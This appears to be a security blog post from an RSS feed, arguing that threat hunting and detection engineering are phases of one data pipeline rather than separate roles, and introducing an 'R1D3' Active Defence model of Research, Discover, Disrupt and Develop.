security operations should be seen as a connected data pipeline, not isolated roles. We introduce the Active Defence Pipeline (R1D3) model to illustrate this, emphasizing the importance of data flow and collaboration over rigid job titles.]]></description><link>https://www.quasarops.com/p/threat-hunt-vs-detection-engineering-the-saga-continues</link><guid isPermaLink="false">https://www.quasarops.com/p/threat-hunt-vs-detection-engineering-the-saga-continues</guid><dc:creator><![CDATA[Diego Perez]]></dc:creator><pubDate>Tue, 06 Feb 2024 07:30:17 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/c93025d2-9b7b-4a8f-9b2f-a8a044b6d03c_1456x832.webp" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Pe8J!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8ca6a5c-2b1e-4133-9a2f-759c48596298_1456x832.webp" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Pe8J!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8ca6a5c-2b1e-4133-9a2f-759c48596298_1456x832.webp 424w, https://substackcdn.com/image/fetch/$s_!Pe8J!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8ca6a5c-2b1e-4133-9a2f-759c48596298_1456x832.webp 848w, https://substackcdn.com/image/fetch/$s_!Pe8J!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8ca6a5c-2b1e-4133-9a2f-759c48596298_1456x832.webp 1272w, https://substackcdn.com/image/fetch/$s_!Pe8J!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8ca6a5c-2b1e-4133-9a2f-759c48596298_1456x832.webp 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Pe8J!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8ca6a5c-2b1e-4133-9a2f-759c48596298_1456x832.webp" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/c8ca6a5c-2b1e-4133-9a2f-759c48596298_1456x832.webp&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;Threat Hunting vs Detection Engineering? The saga continues &#9973;&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Threat Hunting vs Detection Engineering? The saga continues &#9973;" title="Threat Hunting vs Detection Engineering? The saga continues &#9973;" srcset="https://substackcdn.com/image/fetch/$s_!Pe8J!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8ca6a5c-2b1e-4133-9a2f-759c48596298_1456x832.webp 424w, https://substackcdn.com/image/fetch/$s_!Pe8J!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8ca6a5c-2b1e-4133-9a2f-759c48596298_1456x832.webp 848w, https://substackcdn.com/image/fetch/$s_!Pe8J!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8ca6a5c-2b1e-4133-9a2f-759c48596298_1456x832.webp 1272w, https://substackcdn.com/image/fetch/$s_!Pe8J!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8ca6a5c-2b1e-4133-9a2f-759c48596298_1456x832.webp 1456w" sizes="100vw" fetchpriority="high"></picture><div></div></div></a></figure></div><p>I see a lot of people trying to make sense of the roles they occupy in the cyber defence world. Asking yourself these questions is a good thing to do, primarily because&nbsp;<strong>the world's needs advance at a faster pace than our structures can adapt to it</strong>. Let's call this phenomenon&nbsp;<em>structural lag</em> &#8987;.</p><div class="pullquote"><p>&#9878;&#65039; In the cyber security space, structural lag translates into stagnant team structures that add friction and are no longer able to produce answers to the new problems that besiege modern businesses.</p></div><p>One of the many ways in which structural lag manifests is through our persistent use of old lenses to understand new problems, like the complex challenges of security operations nowadays. These lenses were perhaps useful back in the day, but no longer serve to illuminate the way forward. In some cases, these lenses may not fully capture the complexities of an issue, potentially obscuring key aspects of the wider problem space. One such structural lag is the false&nbsp;<em>Threat Hunting vs Detection Engineering</em>&nbsp;dichotomy.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!rBYd!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe898a08f-b84e-43e7-8f38-3e2cf982f8c4_640x461.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!rBYd!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe898a08f-b84e-43e7-8f38-3e2cf982f8c4_640x461.jpeg 424w, https://substackcdn.com/image/fetch/$s_!rBYd!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe898a08f-b84e-43e7-8f38-3e2cf982f8c4_640x461.jpeg 848w, https://substackcdn.com/image/fetch/$s_!rBYd!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe898a08f-b84e-43e7-8f38-3e2cf982f8c4_640x461.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!rBYd!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe898a08f-b84e-43e7-8f38-3e2cf982f8c4_640x461.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!rBYd!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe898a08f-b84e-43e7-8f38-3e2cf982f8c4_640x461.jpeg" width="640" height="461" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/e898a08f-b84e-43e7-8f38-3e2cf982f8c4_640x461.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:461,&quot;width&quot;:640,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;Threat Hunting vs Detection Engineering? The saga continues &#9973;&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Threat Hunting vs Detection Engineering? The saga continues &#9973;" title="Threat Hunting vs Detection Engineering? The saga continues &#9973;" srcset="https://substackcdn.com/image/fetch/$s_!rBYd!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe898a08f-b84e-43e7-8f38-3e2cf982f8c4_640x461.jpeg 424w, https://substackcdn.com/image/fetch/$s_!rBYd!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe898a08f-b84e-43e7-8f38-3e2cf982f8c4_640x461.jpeg 848w, https://substackcdn.com/image/fetch/$s_!rBYd!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe898a08f-b84e-43e7-8f38-3e2cf982f8c4_640x461.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!rBYd!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe898a08f-b84e-43e7-8f38-3e2cf982f8c4_640x461.jpeg 1456w" sizes="100vw"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>This saga has a lot of history, mainly fueled by the rise of both functions due to the increasingly complex threat landscape, real needs, and a sprinkle of industry hype. There are good points made in many of the articles here and glimpses of knowledge that start pointing in the right direction, offering a more data-centric approach that is more conducive to our new reality. Some articles I've read over the years:</p><ul><li><p>02 September 2021, <a href="https://www.watchguard.com/wgrd-news/blog/4-differences-between-threat-hunting-vs-threat-detection?ref=quasarops.com">4 Differences Between Threat Hunting vs. Threat Detection</a>, Watchguard</p></li><li><p>26 October 2021, <a href="https://www.channelpronetwork.com/2021/10/26/threat-hunting-vs-threat-detection/?ref=quasarops.com">Threat Hunting vs Threat Detection</a>, ChannelProNetwork</p></li><li><p>01 December 2021, <a href="https://www.msspalert.com/analysis/threat-hunting-vs-threat-detection-whats-the-difference?ref=quasarops.com">Threat Hunting vs Detection Engineering: what's the difference</a>, MSSPAlert</p></li><li><p>21 February 2023, <a href="https://www.splunk.com/en_us/blog/learn/threat-hunting-vs-threat-detecting.html?ref=quasarops.com">Threat Hunting vs. Threat Detecting: Two Approaches to Finding &amp; Mitigating Threats</a>, Splunk</p></li><li><p>26 February 2023, <a href="https://www.splunk.com/en_us/blog/learn/threat-hunting-vs-threat-detecting.html?ref=quasarops.com">The dotted lines between Threat Hunting and Detection Engineering</a>, Alex Teixeira</p></li><li><p>17 May 2023, <a href="https://zendannyy.substack.com/p/detection-engineering-vs-threat-hunting?ref=quasarops.com">Detection Engineering vs Threat Hunting</a>, Danny's Newsletter</p></li><li><p>19 May 2023, <a href="https://www.cyborgsecurity.com/blog/guarding-the-gates-the-intricacies-of-detection-engineering-and-threat-hunting/?ref=quasarops.com">Guarding the Gates: The Intricacies of Detection Engineering and Threat Hunting</a>, CyborgSecurity</p></li><li><p>08 June 2023, <a href="https://www.cyborgsecurity.com/glossary/detection-engineering-vs-threat-hunting-distinguishing-the-differences/?ref=quasarops.com">Detection Engineering vs Threat Hunting: Distinguishing the Differences</a>, CyborgSecurity</p></li><li><p>01 November 2023, <a href="https://detect.fyi/navigating-the-crossroads-of-threat-hunting-detection-engineering-d48893638bc2?ref=quasarops.com">Navigating the crossroads of Threat Hunting &amp; Detection Engineering</a>, Alex Teixeira</p></li></ul><p>The issue with this contraposition is that it brings the focus to a problem that doesn't help advance the state of the art in cyber defence. Here's what we are missing:</p><ul><li><p><strong>Forget the&nbsp;</strong><em><strong>"hunt vs. detection vs. intel vs. whatever"</strong></em><strong>&nbsp;paradigm &#128683;</strong>. Security processes are inherently intertwined. Ask yourself&nbsp;<em>what problem are you trying to solve, what is your actual goal here?</em>&nbsp;I say we are here to pursue higher systemic robustness where functions are operational "stages" that contribute to a bigger picture.</p></li><li><p><strong>A role doesn't exist in an essentialist manner, it is merely a construct &#128679;</strong>. Roles like "hunter" or "detection engineer" do not predate the activities your SecOps space performs. A "role" is merely a way to define your focus areas. These areas form clusters of activities that become your standard priorities.</p></li><li><p><strong>Oftentimes there is no clear-cut division between roles in security operations &#10135;</strong>. Where does the work of a traditional L3 Security Analyst and an Incident Responder start and end? When is a Detection Engineer behaving as a DevSecOps Engineer and when as a Purple Adversarial Engineer? Is a Responder also a forensic analyst and incident manager?</p></li><li><p><strong>When you start with "roles" as your unit of comparison, you miss something important &#129337;&#8205;&#9794;&#65039;:</strong>&nbsp;it's all about the interconnectedness of activities within a broader ecosystem, there are overlaps, <strong>and </strong>these constitute pivotal articulation points between functions, which is a good thing.</p></li><li><p>It is not merely about roles and functions,&nbsp;<strong>it is about understanding what the actual problem space is &#128301;</strong>. What question are you trying to answer?</p></li><li><p><strong>The problem space is clear: threat-driven or threat-informed defence &#128640;</strong>.</p></li><li><p>Threat-driven cyber defence is another way of saying&nbsp;<strong>Active Defence</strong>.</p></li><li><p><strong>Stop thinking roles, start thinking data</strong>, Active Defence is about crafting a threat-driven data pipeline that can deploy advanced countermeasures.</p></li></ul><p>Why do we care so much what a "threat hunter" vs a "detection engineer" vs a "security analyst" vs an "incident responder" does? Is a threat hunter or incident responder just a glorified security analyst? Is a detection engineer just a glorified DevSecOps engineer or a supercharged security analyst with backend SIEM knowledge? Is a red teamer just a glorified pentester?</p><p>By talking in these terms,&nbsp;<strong>we are already missing the point!</strong>&nbsp;We have to take a step back and understand that&nbsp;<em>role boundaries should be a byproduct of properly planned functional boundaries</em>. Role boundaries should emerge as part of an orchestrated approach towards threat management with a serious focus on understanding threats.</p><p>The collection, processing and deployment of security controls deriving from your approach towards threat management&nbsp;<strong>is what dictates the functions that you&nbsp;</strong><em><strong>need</strong></em><strong>&nbsp;to succeed</strong>. These functions are meant to address classes of problems and become phases in the flow of your security operations.</p><p>&#128161;</p><p><strong>Think of security as a data pipeline, not separate roles</strong>. Data is collected, enriched with context, analyzed for threats, and it triggers actions based on intelligence gleaned from all stages.</p><p>Instead of fixed roles like hunting, detection, and intelligence, imagine a security pipeline where data flows seamlessly between stages with functions like acquisition, enrichment, analysis, and implementation.</p><p>Behind all this is the concept of&nbsp;<strong>a threat-driven cyber defence pipeline</strong>. This pipeline is a complex engineering effort consisting of phases that help understand and deploy better security controls. Ultimately, this threat-driven pipeline aims to protect the business from the risks posed by cyber threats&nbsp;<em>to the many value-generating streams that justify our existence</em>. Unless you are a cyber security company, CyberSec is an&nbsp;<em>enabler</em>&nbsp;of value and not a producer of value per se.</p><h2>R1D3: Active Defence Pipeline</h2><p>So what does this Active Defence Pipeline look like? At a very high level, it comprises four basic activities all cyber defence operations perform, knowingly or not: Research, Discovery, Disruption and Development. This is why I call it&nbsp;<strong>R1D3</strong>&nbsp;(pronounced simply "<strong>RIDE</strong>" or if you are a Star Wars fan just say R1D3 as if you would call R2-D2 &#9883;&#65039;).</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!cEpV!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2d5e34ac-c588-4fe5-b691-cb15cc9466da_1267x374.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!cEpV!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2d5e34ac-c588-4fe5-b691-cb15cc9466da_1267x374.jpeg 424w, https://substackcdn.com/image/fetch/$s_!cEpV!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2d5e34ac-c588-4fe5-b691-cb15cc9466da_1267x374.jpeg 848w, https://substackcdn.com/image/fetch/$s_!cEpV!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2d5e34ac-c588-4fe5-b691-cb15cc9466da_1267x374.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!cEpV!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2d5e34ac-c588-4fe5-b691-cb15cc9466da_1267x374.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!cEpV!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2d5e34ac-c588-4fe5-b691-cb15cc9466da_1267x374.jpeg" width="1267" height="374" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/2d5e34ac-c588-4fe5-b691-cb15cc9466da_1267x374.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:374,&quot;width&quot;:1267,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;Threat Hunting vs Detection Engineering? The saga continues &#9973;&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Threat Hunting vs Detection Engineering? The saga continues &#9973;" title="Threat Hunting vs Detection Engineering? The saga continues &#9973;" srcset="https://substackcdn.com/image/fetch/$s_!cEpV!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2d5e34ac-c588-4fe5-b691-cb15cc9466da_1267x374.jpeg 424w, https://substackcdn.com/image/fetch/$s_!cEpV!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2d5e34ac-c588-4fe5-b691-cb15cc9466da_1267x374.jpeg 848w, https://substackcdn.com/image/fetch/$s_!cEpV!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2d5e34ac-c588-4fe5-b691-cb15cc9466da_1267x374.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!cEpV!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2d5e34ac-c588-4fe5-b691-cb15cc9466da_1267x374.jpeg 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Let's unpack this a little.</p><h3>Research</h3><p>The process by which you seek to understand the threats that may impact your business. This is achieved by actively collecting, triaging and synthesizing data about your internal and external threat landscape. The research phase is also where you assess the significance of threat events to your industry vertical and, more importantly,&nbsp;<strong>you model these threats in terms of discrete data points called threat maps</strong>&nbsp;(you know many threat map models already, MITRE ATT&amp;CK, MITRE D3FEND, MITRE ATTACK FLOW, etc.). These threat maps adopt structured formats for sharing your research downstream.</p><h3>Discover</h3><p>The process by which you go beyond the analysis and start actively exploring your internal infrastructure and external perimeter to understand your exposure, readiness, control gaps and any instances of compromise. <strong>This is the phase where you project your initial research</strong> onto your <strong>real </strong>operational environment. This means your original data points will be transformed because your operational environment has its own texture and nuances that abstract research doesn't expose. <em>Original data points will go through a process of implicit or explicit feature selection and dimensionality reduction</em>.</p><p>Discovery involves finding something new, illuminating connections, and forming novel understandings that truly bring your research to the concrete and practical terrain that is your organization.</p><h3>Disrupt</h3><p>The process by which you intercept and interrupt adversarial attack patterns. Disruption is about shattering adversaries' memorized patterns, destabilising and disorienting opponents, imposing high operational costs and creating crucial windows of opportunity for you to achieve defensive mission objectives. Disruption is usually comprised of deception, detection and response, i.e. all the different ways in which you can "engage" the adversary.</p><h3>Develop</h3><p>The process by which you ensure findings are communicated, controls implemented (and yes, a detector artifact is just another security control, the same as a decoy or lure is) and your attack surface is ultimately transformed. Transformation here means your ability to integrate learnings into wider structures and processes informing policies and procedures.</p><h2>R1D3 Data Flow</h2><p>The active defence pipeline ultimately leads to a more resilient security posture and better preparedness against evolving threats. We could further develop our pipeline into its constituent parts, I will share a diagram here but will leave the expansion of the topic for the next post:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!OIJe!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd44b7b5c-e045-4018-b18c-cf26edaf3b1a_1314x570.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!OIJe!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd44b7b5c-e045-4018-b18c-cf26edaf3b1a_1314x570.png 424w, https://substackcdn.com/image/fetch/$s_!OIJe!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd44b7b5c-e045-4018-b18c-cf26edaf3b1a_1314x570.png 848w, https://substackcdn.com/image/fetch/$s_!OIJe!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd44b7b5c-e045-4018-b18c-cf26edaf3b1a_1314x570.png 1272w, https://substackcdn.com/image/fetch/$s_!OIJe!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd44b7b5c-e045-4018-b18c-cf26edaf3b1a_1314x570.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!OIJe!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd44b7b5c-e045-4018-b18c-cf26edaf3b1a_1314x570.png" width="1314" height="570" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/d44b7b5c-e045-4018-b18c-cf26edaf3b1a_1314x570.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:570,&quot;width&quot;:1314,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;Threat Hunting vs Detection Engineering? The saga continues &#9973;&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Threat Hunting vs Detection Engineering? The saga continues &#9973;" title="Threat Hunting vs Detection Engineering? The saga continues &#9973;" srcset="https://substackcdn.com/image/fetch/$s_!OIJe!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd44b7b5c-e045-4018-b18c-cf26edaf3b1a_1314x570.png 424w, https://substackcdn.com/image/fetch/$s_!OIJe!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd44b7b5c-e045-4018-b18c-cf26edaf3b1a_1314x570.png 848w, https://substackcdn.com/image/fetch/$s_!OIJe!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd44b7b5c-e045-4018-b18c-cf26edaf3b1a_1314x570.png 1272w, https://substackcdn.com/image/fetch/$s_!OIJe!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd44b7b5c-e045-4018-b18c-cf26edaf3b1a_1314x570.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>If you've been following my posts and articles over the last three years, you know I've been preaching a straightforward idea: <em>security operations <strong>is</strong> a data problem</em>. The reality is that Hunting and Detection Engineering are phases of a bigger threat-driven strategy that has different operational aspects. Roles are merely constructs that represent units of work within functional boundaries. They have meaning within the context of your organization and sometimes the wider industry.</p><p>However, roles and teams should NOT be the boundary lines where you start developing your strategy. <em>If you are doing this, you are already starting on the wrong foot! Start with data, start with intel, and start with defining your operational objectives.</em></p><p>The Active Defence Pipeline should be the start of your SecOps strategy, based on this you can start to trace the phases of your operations, then the functions and finally the roles. By proceeding this way, roles emerge as a logical outcome of your strategy, instead of the other way around.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!XufM!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe7018b53-5fb9-4576-bcab-6937a1901cff_2114x679.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" 